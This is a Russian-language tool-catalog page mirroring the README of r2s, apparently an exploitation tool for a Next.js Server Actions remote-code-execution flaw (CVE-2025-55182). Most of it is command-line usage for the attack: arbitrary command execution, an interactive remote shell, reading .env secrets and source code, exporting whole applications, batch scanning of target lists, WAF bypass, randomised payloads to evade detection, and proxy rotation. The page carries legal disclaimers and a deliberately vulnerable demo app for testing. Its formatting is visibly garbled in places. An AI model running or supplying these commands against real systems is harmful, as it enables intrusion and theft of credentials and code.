Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
r2s — Продвинутый инструмент для тестирования безопасности для оценки уязвимости CVE-2025-55182 в приложениях Next.js. Включает интерактивную оболочку, пакетное сканирование, обход WAF и всестороннюю отчетность. | Kitploit
Инструменты/GitHubGitHub/zamdevio/r2s
Сканеры уязвимостейГенерация полезной нагрузкиЭксплуатацияЭксплуатация веб-приложенийСбор информацииОбход WAFТестирование на ПроникновениеКомандование и Управление
GitHubzamdevio/r2s

r2s

Продвинутый инструмент для тестирования безопасности для оценки уязвимости CVE-2025-55182 в приложениях Next.js. Включает интерактивную оболочку, пакетное сканирование, обход WAF и всестороннюю отчетность.

28 месяцев назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться
Репозиторий
Сайт

React2Shell (R2S) - Инструмент тестирования CVE-2025-55182

R2S Баннер Python Лицензия

Продвинутый инструмент тестирования эксплуатации для оценки уязвимости CVE-2025-55182

Особенности • Установка • Использование • Тестовая среда • Правовая информация


📖 Что такое R2S?

R2S (React2Shell) — это инструмент тестирования безопасности, предназначенный для помощи исследователям безопасности, разработчикам и пентестерам в оценке уязвимости их приложений Next.js к CVE-2025-55182.

Понимание CVE-2025-55182

CVE-2025-55182 — это критическая уязвимость, затрагивающая Server Actions в Next.js в определенных версиях (например, 16.0.5). Эта уязвимость позволяет злоумышленникам выполнять произвольные команды на сервере через неправильно защищенные Server Actions, что приводит к удаленному выполнению кода (RCE).

R2S помогает вам проверить, есть ли эта проблема в вашем приложении, чтобы вы могли исправить ее до того, как злоумышленники найдут ее.


⚠️ Важные замечания

Флаг команд Windows (--windows)

⚠️ КРИТИЧЕСКОЕ ПРЕДУПРЕЖДЕНИЕ: Флаг --windows может привести к тому, что инструмент НЕ СМОЖЕТ определить уязвимость при неправильном использовании.

  • Поведение по умолчанию: Инструмент использует команды Unix/Linux (большинство серверов Next.js работают на Linux)
  • Когда использовать --windows: Только если вы на 100% уверены, что целевой сервер работает под Windows
  • Что произойдет при ошибке: Если вы используете --windows на сервере Linux, команды не сработают, и инструмент может сообщить «не уязвим», даже если сервер уязвим
  • Лучшая практика: Позвольте инструменту автоматически определить платформу или не используйте --windows, если вы не знаете, что целевая система — Windows

Пример:```bash

❌ WRONG - Using --windows on a Linux server

r2s -u http://linux-server.com -t --windows

Result: Commands fail, tool may report "not vulnerable" (FALSE NEGATIVE)

✅ CORRECT - Let tool use default Unix/Linux commands

r2s -u http://linux-server.com -t

Result: Proper detection of vulnerability

root@kitploit:~
---
---

## ⚠️ Правовое предупреждение

**ВАЖНО: ПРОЧТИТЕ ЭТО ПЕРЕД ИСПОЛЬЗОВАНИЕМ ИНСТРУМЕНТА**

1. **Этот инструмент предназначен ТОЛЬКО для ЛЕГИТИМНОГО тестирования безопасности**
   - ✅ Тестируйте свои собственные приложения
   - ✅ Тестируйте приложения, на тестирование которых у вас есть письменное разрешение
   - ✅ Образовательные цели и исследования в области безопасности
   - ❌ **НИКОГДА не используйте на системах, которыми вы не владеете или на тестирование которых у вас нет разрешения**
   - ❌ **НИКОГДА не используйте во вредоносных целях**

2. **Используя этот инструмент, вы соглашаетесь, что:**
   - Вы будете использовать его только на системах, которыми владеете или на тестирование которых имеете явное письменное разрешение
   - Вы понимаете, что несанкционированный доступ к компьютерным системам незаконен
   - Вы принимаете на себя полную ответственность за свои действия
   - Авторы не несут ответственности за любое неправомерное использование этого инструмента

3. **Правовые последствия:**
   - Несанкционированный доступ к компьютерным системам является преступлением в большинстве стран
   - Вы можете столкнуться с уголовным преследованием, штрафами и тюремным заключением
   - Всегда получайте письменное разрешение перед тестированием

4. **Этот инструмент предоставляется «КАК ЕСТЬ» без каких-либо гарантий**

**Если вам меньше 18 лет, обязательно обеспечьте надзор взрослых и получите разрешение перед использованием этого инструмента.**

---

## ✨ Возможности

### Ключевые возможности
- 🔍 **Обнаружение уязвимостей** - Быстрая проверка, уязвим ли сервер к CVE-2025-55182
- 💻 **Интерактивная оболочка** - Полноценная интерактивная сессия shell через HTTPS с историей команд
- 📁 **Операции с файлами** - Просмотр каталогов, чтение файлов, экспорт файлов/архивов
- 🔐 **Извлечение секретов** - Попытка чтения секретов приложений (файлы .env, конфигурационные файлы)
- 📄 **Извлечение кода** - Попытка чтения исходного кода приложения
- 🖥️ **Информация о системе** - Сбор информации об ОС, имени хоста, пользователе и переменных окружения

### Расширенные возможности
- 🚀 **Авто-подогрев полезных нагрузок** - Автоматическая оптимизация полезных нагрузок для наилучших результатов
- ⚡ **Параллельное выполнение** - Одновременный запуск нескольких команд
- 🎲 **Случайный выбор полезных нагрузок** - Уклонение от обнаружения с помощью динамических нагрузок
- 🛠️ **Модули эксплойтов** - Модульная система в стиле Metasploit (env_dump, file_search, network_scan, process_list)
- 🔄 **Обработка перенаправлений** - Автоматическое следование HTTP-перенаправлениям (301, 302, 303, 307, 308)
- 🎨 **Красивый интерфейс** - Цветной вывод для удобства чтения
- 📊 **Комплексная отчетность** - Автосохранение отчетов в форматах JSON, HTML, TXT с форматтерами для конкретных операций
- ⚙️ **Система конфигурации** - Конфигурация на основе JSON с интерактивной панелью настроек
- 📦 **Функция экспорта** - Экспорт отдельных файлов или целых каталогов приложений в виде zip-архивов
- 🔒 **Обход WAF** - Несколько методов обхода (⚠️ Не гарантируется — см. ограничения ниже)

### Отчетность и логирование
- 📝 **Автосохранение отчетов** - Автоматическое сохранение отчетов в `~/.r2s/reports/` с читаемыми метками времени
- 📋 **Форматы для конкретных операций** - Разные форматы отчетов для разных операций (shell, test, secrets и т.д.)
- 📜 **История команд** - Постоянная история команд, сохраняемая в `~/.r2s/history`
- 🔍 **Аудиторские следы** - Детальное логирование всех операций в `~/.r2s/logs/audit.log`
- 🎨 **HTML-отчеты** - Красивые HTML-отчеты с темной/светлой темой, кнопками копирования и блоками кода

---

## 📦 Установка

### Вариант 1: Сборка из исходников (рекомендуется)

1. **Клонируйте репозиторий:**   ```bash
   git clone https://github.com/zamdevio/r2s.git
   cd r2s
  1. Установите зависимости: ```bash pip install -r requirements.txt
    root@kitploit:~
  2. Создайте автономный бинарный файл: ```bash ./build.sh
    root@kitploit:~
  3. Установка в систему (опционально): ```bash sudo cp dist/r2s /usr/local/bin/ sudo chmod +x /usr/local/bin/r2s
    root@kitploit:~
  4. Очистить артефакты сборки (опционально): ```bash

    Remove build/, dist/, pycache/, and other build files

    ./build.sh cleanup
    root@kitploit:~

Вариант 2: Использовать скрипт Python напрямую```bash

Install dependencies

pip install -r requirements.txt

Run directly

python3 -m react2shell.main --help

Or after building:

r2s --help

root@kitploit:~
---

## 🚀 Быстрый старт

### Базовый тест на уязвимости```bash
# Test if a server is vulnerable
r2s -u http://localhost:3000 -t

# With verbose output for more details
r2s -u http://localhost:3000 -t -v

⚠️ Важно: Не используйте --windows, если вы не уверены, что цель — Windows. Использование --windows на Linux-сервере приведет к ложноотрицательным результатам (инструмент может сообщить «не уязвимо», даже если сервер уязвим).

Тестирование с онлайн-демо

Мы предоставляем безопасную среду тестирования по адресу **https://r2s-arena.fly.dev**:```bash

Test the online demo

r2s -u https://r2s-arena.fly.dev -t

root@kitploit:~
### Тестирование локально

См. [`nextjs/README.md`](https://github.com/zamdevio/r2s/blob/HEAD/nextjs/README.md) инструкции по запуску уязвимого приложения локально.

---

## 📚 Примеры использования

### Краткая справка по командам

**Наиболее часто используемые команды:**
- `r2s -u URL -t` - Проверка на уязвимость (наиболее часто используется)
- `r2s -u URL --shell` - Запуск интерактивной оболочки
- `r2s --targets FILE -t` - Пакетное сканирование нескольких целей
- `r2s -u URL --system-info` - Получить информацию о системе
- `r2s -u URL --secrets` - Попытка чтения секретов
- `r2s -u URL --export-archive` - Экспорт всего приложения в zip

**⚠️ Помните**: Не используйте `--windows`, если цель не является Windows!

---

### Базовые операции```bash
# Test vulnerability
r2s -u http://localhost:3000 -t

# List directory contents
r2s -u http://localhost:3000 --list-dir /app

# Read files
r2s -u http://localhost:3000 --read-file .env
r2s -u http://localhost:3000 --read-file package.json

# Get system information
r2s -u http://localhost:3000 --system-info

# Execute custom commands
r2s -u http://localhost:3000 --command "whoami"
r2s -u http://localhost:3000 --command "uname -a"

Интерактивная оболочка```bash

Start interactive shell session

r2s -u http://localhost:3000 --shell

Features:

- Arrow keys for command history (↑/↓)

- Arrow keys for cursor movement (←/→)

- Command aliases: nano/vi/vim/emacs → cat, clear → cls

- Colored file/folder output in ls

- Persistent history saved to ~/.r2s/history

- Auto-save shell session reports

root@kitploit:~
### Эксплойт-модули```bash
# List available modules
r2s --list-modules

# Use a module
r2s -u http://localhost:3000 --module env_dump

# Use module with options
r2s -u http://localhost:3000 --module file_search --set pattern="*.env" --set path="/app"

# Get module information
r2s --module-info env_dump

Функциональность экспорта```bash

Export a single file

r2s -u http://localhost:3000 --export src/app/page.tsx

Saved to: ~/.r2s/exports/{domain}/src/app/page.tsx

Export entire app directory as zip archive

r2s -u http://localhost:3000 --export-archive

What it does:

- Creates a zip archive of the entire app directory on the server

- Automatically excludes files matching .gitignore patterns

- Downloads the archive to your local machine

- Automatically deletes the archive from the server after download

- Saved to: ~/.r2s/exports/{domain}/r2s_export_TIMESTAMP.zip

Note: This operation may take a while for large applications

Configure export directory

r2s settings

Navigate to "export" section and set "export_dir"

root@kitploit:~
### Секреты и извлечение кода```bash
# Attempt to read application secrets
r2s -u http://localhost:3000 --secrets
# Tries: .env, .env.local, .env.production, config.json, etc.

# Attempt to read application source code
r2s -u http://localhost:3000 --code
# Tries: src/**/*.ts, src/**/*.tsx, src/**/*.js, etc.

Пакетное сканирование (Несколько целей)```bash

Scan multiple targets from file (one URL per line)

r2s --targets targets.txt -t

Batch mode: no interactive prompts, auto-continue

r2s --targets targets.txt --batch -t

Scan with rate limiting (2 requests per second)

r2s --targets targets.txt -t --rate 2

Add delay between targets (1 second)

r2s --targets targets.txt -t --delay 1

Combine options for safe batch scanning

r2s --targets targets.txt --batch -t --rate 1 --delay 2

root@kitploit:~
### Расширенные параметры```bash
# Parallel execution (run multiple commands simultaneously)
r2s -u http://localhost:3000 --parallel 5 --command "whoami;id;uname -a"

# WAF bypass (⚠️ Not guaranteed - see limitations below)
r2s -u http://localhost:3000 -t --waf-bypass

# Auto-warm payloads (optimize payloads before execution)
r2s -u http://localhost:3000 -t --auto-warm

# Randomize payloads (evade static detection)
r2s -u http://localhost:3000 --command "whoami" --randomize

# Different header strategies
r2s -u http://localhost:3000 -t --header-strategy chrome_latest
# Options: default, chrome_latest, firefox, minimal, assetnote

# Custom timeout (0 = no timeout)
r2s -u http://localhost:3000 --command "long-running-command" --timeout 0

# Disable SSL verification
r2s -u https://target.com -t --insecure

# Rate limiting (requests per second)
r2s -u http://localhost:3000 -t --rate 2

# Delay between requests (seconds)
r2s -u http://localhost:3000 --command "whoami" --delay 1

Прокси и сетевые опции```bash

Use HTTP proxy

r2s -u http://localhost:3000 -t --proxy http://proxy.example.com:8080

Use proxy with authentication

r2s -u http://localhost:3000 -t --proxy http://user:[email protected]:8080

Load and rotate proxies from file (one proxy per line)

r2s -u http://localhost:3000 -t --proxy-file proxies.txt

Rate limiting with proxy rotation

r2s --targets targets.txt -t --proxy-file proxies.txt --rate 1

root@kitploit:~
### Логирование и аудит```bash
# Log all operations to specific file
r2s -u http://localhost:3000 -t --log r2s_session.log

# Create detailed audit trail (saved to ~/.r2s/logs/audit.log)
r2s -u http://localhost:3000 -t --audit

# Combine logging with batch scanning
r2s --targets targets.txt --batch -t --log batch_scan.log --audit

Настройки и конфигурация```bash

Open interactive settings panel

r2s settings

Configure:

- Report formats (JSON, HTML, TXT per operation)

- Auto-save reports (on/off)

- Export directory

- Default timeouts

- And more...

Clean up all tool data

r2s cleanup

Removes: config, history, logs, reports, exports

Uninstall the tool (standalone binaries only)

r2s uninstall

root@kitploit:~
### Отчетность```bash
# Reports are auto-saved to ~/.r2s/reports/ by default
# Format: {operation}_{YYYYMMDD_HHMMSS}.{json,html,txt}

# Disable auto-save
r2s -u http://localhost:3000 -t --no-report

# Save to specific location (disables auto-save)
r2s -u http://localhost:3000 -t --output /path/to/report.json

# View reports
ls ~/.r2s/reports/
cat ~/.r2s/reports/test_20251206_120000.html

🎯 Типичные сценарии использования

1. Тестирование собственного приложения```bash

Start your Next.js app

cd my-nextjs-app npm run dev

In another terminal, test it

r2s -u http://localhost:3000 -t

root@kitploit:~
### 2. Аудит безопасности```bash
# Comprehensive security check
r2s -u http://localhost:3000 -t --waf-bypass
r2s -u http://localhost:3000 --system-info
r2s -u http://localhost:3000 --secrets
r2s -u http://localhost:3000 --code
r2s -u http://localhost:3000 --export-archive

3. Образовательное тестирование

Используйте предоставленное приложение nextjs для безопасного локального тестирования:```bash cd nextjs npm install npm run dev

Test in another terminal

r2s -u http://localhost:3000 -t

root@kitploit:~
Смотрите [`nextjs/README.md`](https://github.com/zamdevio/r2s/blob/HEAD/nextjs/README.md) для подробных инструкций.

---

## 🏗️ Архитектура

R2S использует модульную архитектуру для удобства поддержки и расширяемости:```
react2shell/
├── main.py              # Main entry point
├── classes/             # Core classes
│   ├── detector.py     # Target detection
│   ├── executor.py     # Command execution
│   ├── modules.py      # Exploit modules system
│   ├── operations.py   # High-level operations
│   ├── payload.py      # Payload building and randomization
│   └── shell.py        # Interactive shell
├── services/            # Services
│   ├── config.py       # Configuration management (JSON)
│   ├── exporter.py     # File and archive export
│   ├── formatters.py   # Report formatters
│   ├── history.py      # Command history
│   ├── logger.py       # Logging and audit trails
│   ├── proxy.py        # Proxy management
│   └── reporter.py     # Report generation
└── utils/              # Utilities
    ├── colors.py       # Color utilities
    └── helpers.py      # Helper functions

См. react2shell/README.md для подробной документации по архитектуре.


🧪 Тестовая среда

Мы предоставляем безопасную тестовую среду под названием nextjs, которую вы можете использовать для тестирования инструмента без риска для реальных систем.

Онлайн-демонстрация

Посетите: https://r2s-arena.fly.dev

Это общедоступное, намеренно уязвимое приложение только для целей тестирования.

Локальное тестирование

См. nextjs/README.md для инструкций по запуску локально.

⚠️ Важно: Приложение nextjs намеренно уязвимо и НИКОГДА не должно использоваться в производственной среде или с реальными данными.


📖 Справочник команд

Основные команды

Команды экспорта

КомандаОписание
--export ФАЙЛ, --ex ФАЙЛЭкспортировать один файл с цели (сохраняется в ~/.r2s/exports/{domain}/)
--export-archiveЭкспортировать весь каталог приложения как zip-архив. Создаёт zip на сервере, загружает его, затем удаляет с сервера. Исключает шаблоны .gitignore. Сохраняется в ~/.r2s/exports/{domain}/r2s_export_TIMESTAMP.zip

Команды модулей

КомандаОписание
--module ИМЯВыполнить эксплойт-модуль
--module-list, --list-modulesВывести список доступных модулей

Расширенные опции

Опции отчётов

ОпцияОписание
--output ФАЙЛ, -o ФАЙЛСохранить результаты в указанный файл (отключает автосохранение)

Сетевые и прокси-опции

Пакетные опции и опции автоматизации

ОпцияОписание
--targets ФАЙЛСканировать несколько целей из файла (один URL на строку, поддерживает комментарии с #)
--batchПакетный режим: пропустить все интерактивные подсказки, автоматическое продолжение (полезно для автоматизации/скриптов)

Специальные команды

КомандаОписание
r2s settingsОткрыть интерактивную панель настроек
r2s cleanup

🔧 Устранение неполадок

"Ошибка SSL"```bash

Use --insecure flag to bypass SSL verification

r2s -u https://target.com -t --insecure

root@kitploit:~
### "Ошибка подключения"

- Проверьте, запущен ли сервер
- Убедитесь, что URL указан правильно
- Проверьте настройки брандмауэра
- Попробуйте увеличить время ожидания: `--timeout 30`

### "Запрос заблокирован"```bash
# Try WAF bypass (⚠️ Not guaranteed - see WAF Bypass Limitations below)
r2s -u https://target.com -t --waf-bypass

# Try different header strategies
r2s -u https://target.com -t --header-strategy chrome_latest
r2s -u https://target.com -t --header-strategy firefox

"Невозможно определить уязвимость" или ложноотрицательные результаты

⚠️ ВАЖНО: Флаг команд Windows

Если вы получаете ложноотрицательные результаты (инструмент говорит «не уязвимо», но цель на самом деле уязвима), проверьте:

  1. Использовали ли вы флаг --windows?

    • Флаг --windows заставляет инструмент использовать команды Windows (PowerShell, dir и т. д.)
    • Если ваша цель — Unix/Linux (а большинство серверов Next.js именно такие), использование --windows приведет к СБОЮ инструмента
    • Инструмент попытается выполнить команды Windows на Linux-сервере, что приведет к сбою
    • Решение: Удалите флаг --windows (по умолчанию используется Unix/Linux)
  2. Определение платформы

    • Инструмент автоматически определяет платформу, но вы можете переопределить это
    • Используйте --windows только если вы на 100% уверены, что цель — Windows
    • Большинство развертываний Next.js выполняется на системах Linux/Unix
  3. Тестовая команда

    • По умолчанию используется команда Unix: echo $((41*271))
    • С флагом --windows используется: powershell -c "41*271"
    • Если сервер Linux, а вы используете команды Windows, тест завершится неудачей

Пример проблемы:```bash

❌ WRONG - This will fail if target is Linux

r2s -u http://linux-server.com -t --windows

✅ CORRECT - Let tool auto-detect or use default (Unix/Linux)

r2s -u http://linux-server.com -t

root@kitploit:~
### Ограничения обхода WAF

**⚠️ Важно:** Методы обхода WAF в этом инструменте **НЕ ГАРАНТИРУЮТ** работу и имеют ряд ограничений:

- **Не универсально**: Разные WAF используют разные методы обнаружения. То, что работает для одного, может не работать для другого.
- **Статическое обнаружение**: Некоторые WAF используют сопоставление статических шаблонов, которое можно обойти, но современные WAF применяют поведенческий анализ.
- **Ограничение частоты запросов**: Многие WAF реализуют ограничение частоты, которое может блокировать повторные попытки.
- **Машинное обучение**: Продвинутые WAF используют модели машинного обучения, которые адаптируются и учатся на шаблонах атак.
- **Cloudflare / AWS WAF**: Корпоративные WAF (Cloudflare, AWS WAF и др.) чрезвычайно сложно обойти.
- **Без гарантий**: Методы обхода являются экспериментальными и могут не сработать против хорошо настроенных WAF.

**Рекомендации:**
- Используйте обход WAF только в крайнем случае
- Пробуйте разные стратегии заголовков (`--header-strategy`)
- Комбинируйте с `--randomize` для лучших результатов
- Понимайте, что некоторые цели может быть невозможно обойти
- Всегда тестируйте на системах, которыми вы владеете или на тестирование которых у вас есть разрешение

### Проблемы сборки```bash
# Make sure Python 3.7+ is installed
python3 --version

# Install dependencies
pip install -r requirements.txt

# Clean previous build artifacts
./build.sh cleanup

# Try building again
./build.sh

Очистка артефактов сборки

Чтобы безопасно удалить все артефакты сборки (каталоги сборки, файлы кэша и т.д.):```bash ./build.sh cleanup

root@kitploit:~
Это удалит:
- `build/` каталог (файлы сборки PyInstaller)
- `dist/` каталог (скомпилированные бинарные файлы)
- `__pycache__/` каталоги (кэш Python, рекурсивно)
- `*.pyc` файлы (скомпилированный байт-код Python)
- `*.pyo` файлы (оптимизированный байт-код Python)
- `*.spec` файлы (файлы спецификаций PyInstaller)

**Примечание:** Это удаляет только артефакты сборки, а не ваш исходный код. Очистка безопасна и запросит подтверждение перед выполнением.

---

## 📁 Структура файлов```
r2s/
├── README.md                 # This file
├── LICENSE                   # MIT License
├── requirements.txt          # Python dependencies
├── build.sh                  # Build script for standalone binary
├── r2s_entry.py              # PyInstaller entry point
├── react2shell/              # Main package
│   ├── README.md            # Architecture documentation
│   ├── main.py              # Entry point
│   ├── classes/             # Core classes
│   ├── services/            # Services
│   └── utils/               # Utilities
└── nextjs/                   # Testing environment
    └── README.md            # Testing environment documentation

🤝 Вклад

Вклад приветствуется! Пожалуйста:

  1. Сделайте форк репозитория
  2. Создайте ветку для функции
  3. Внесите изменения
  4. Отправьте pull request

Помните: Вносите только код, который помогает в легитимном тестировании безопасности.


📝 Лицензия

Этот проект лицензирован по лицензии MIT — подробности в файле LICENSE.

Однако использование этого инструмента подчиняется указанному выше юридическому отказу от ответственности. Использование инструмента для несанкционированного доступа незаконно и не покрывается этой лицензией.


👨‍💻 Разработчик

zamdevio

  • GitHub: https://github.com/zamdevio
  • Репозиторий проекта: https://github.com/zamdevio/r2s

🙏 Благодарности

  • Исследователи безопасности, обнаружившие CVE-2025-55182
  • Сообщество безопасности открытого кода
  • Все участники этого проекта

📞 Поддержка

  • Проблемы: GitHub Issues
  • Безопасность: Сообщайте о проблемах безопасности ответственно

⚠️ Финальное напоминание

Этот инструмент предназначен ТОЛЬКО для тестирования безопасности и образовательных целей.

  • ✅ Всегда получайте разрешение перед тестированием
  • ✅ Тестируйте только системы, которыми владеете или на которые имеете разрешение
  • ✅ Используйте ответственно и этично
  • ❌ Никогда не используйте в злонамеренных целях
  • ❌ Никогда не тестируйте системы без разрешения

Оставайтесь законопослушными, этичными и в безопасности! 🛡️


Сделано с ❤️ для сообщества безопасности

⬆ Наверх

Скачать инструмент
КомандаОписание
-u, --url URLЦелевой URL (обязателен для большинства операций)
-t, --testПроверить, уязвим ли сервер
-ld, --list-dir ПУТЬВывести содержимое каталога
-rf, --read-file ФАЙЛПрочитать содержимое файла
-si, --system-infoПолучить информацию о системе
-sr, --secretsПопытаться прочитать секреты
-c, --codeПопытаться прочитать исходный код
-cmd, --command КОМАНДАВыполнить произвольную команду
--shellЗапустить интерактивную оболочку
--module-info ИМЯПоказать информацию о модуле
--set КЛЮЧ=ЗНАЧЕНИЕУстановить опцию модуля
ОпцияОписание
--waf-bypassПопробовать методы обхода WAF (⚠️ Не гарантируется — см. ограничения ниже)
--waf-bypass-size КБРазмер мусорных данных для обхода WAF в КБ (по умолчанию: 128)
--vercel-waf-bypassВключить методы обхода Vercel-специфического WAF
--header-strategy СТРАТЕГИЯСтратегия HTTP-заголовков: default, chrome_latest, firefox, minimal, assetnote
--parallel NВыполнить N команд параллельно (полезно для нескольких команд)
--auto-warmАвтоматически разогреть и оптимизировать полезные нагрузки перед выполнением
--randomizeРандомизировать полезные нагрузки для обхода статического обнаружения
--no-follow-redirectsНе следовать автоматически за HTTP-редиректами (301, 302 и т.д.)
-k, --insecureОтключить проверку SSL-сертификата (использовать с осторожностью)
--timeout СЕКУНДЫВремя ожидания запроса в секундах (по умолчанию: 10, используйте 0 для отсутствия тайм-аута)
--windows⚠️ ПРЕДУПРЕЖДЕНИЕ: Использовать команды Windows вместо Unix/Linux. Это может привести к тому, что инструмент НЕ СМОЖЕТ определить уязвимость, если цель на самом деле Unix/Linux. Используйте только если вы уверены, что цель — Windows.
--rate СКОРОСТЬОграничить запросы до СКОРОСТИ запросов в секунду (полезно для пакетного сканирования)
--delay СЕКУНДЫДобавить задержку между запросами в секундах (помогает избежать ограничения скорости)
--batchПакетный режим: пропустить все интерактивные подсказки, автоматическое продолжение (полезно для автоматизации)
--no-reportОтключить автоматическое сохранение отчёта в ~/.r2s/reports/
--log ФАЙЛЗаписывать все операции в указанный файл (подробный журнал операций)
--auditСоздать подробный аудиторский след (сохраняется в ~/.r2s/logs/audit.log)
ОпцияОписание
--proxy URLИспользовать HTTP-прокси (формат: http://прокси:порт или http://пользователь:пароль@прокси:порт)
--proxy-file ФАЙЛЗагрузить и циклически использовать прокси из файла (один прокси на строку, формат: http://прокси:порт)
--rate СКОРОСТЬОграничить запросы до СКОРОСТИ запросов в секунду (предотвращает перегрузку цели)
--delay СЕКУНДЫДобавить задержку между запросами в секундах (помогает избежать ограничения скорости)
Удалить все данные R2S (конфигурацию, историю, журналы, отчёты, экспорт)
r2s uninstallУдалить бинарный файл R2S и все данные
r2s helpПоказать справку